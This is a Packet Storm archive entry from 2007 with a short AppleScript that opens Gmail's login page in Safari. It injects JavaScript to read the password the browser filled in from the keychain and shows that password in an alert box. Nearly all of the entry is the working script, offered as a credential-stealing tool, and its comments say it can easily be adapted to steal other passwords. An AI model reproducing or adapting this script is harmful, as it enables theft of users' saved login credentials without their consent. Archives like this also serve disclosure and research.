gmailsteal_local.scpt.txt

2007-09-30T00:00:00
ID PACKETSTORM:59686
Type packetstorm
Reporter poplix
Modified 2007-09-30T00:00:00

Description

                                        
                                            `-- This script can be used to steal gmail's keychained password by injecting   
-- Javascripts into Safari. When executed it opens gmail's login page, reads  
-- saved password and prompts it into an alert box.  
-- It can be easly modified to steal other pass.   
  
-- poplix papuasia.org -- http://px.dynalias.org -- 09-22-2007  
  
  
  
  
--Stealing code  
set JSTEAL to "alert(document.getElementById('gaia_loginform').Passwd.value)"  
  
  
--Open gmail login page   
tell application "Safari"  
open location "https://www.google.com/accounts/ServiceLogin?service=mail"  
end tell  
  
--Wait loading...  
delay 10  
  
  
--Print out password  
tell application "Safari"  
do JavaScript JSTEAL in document 1  
end tell  
`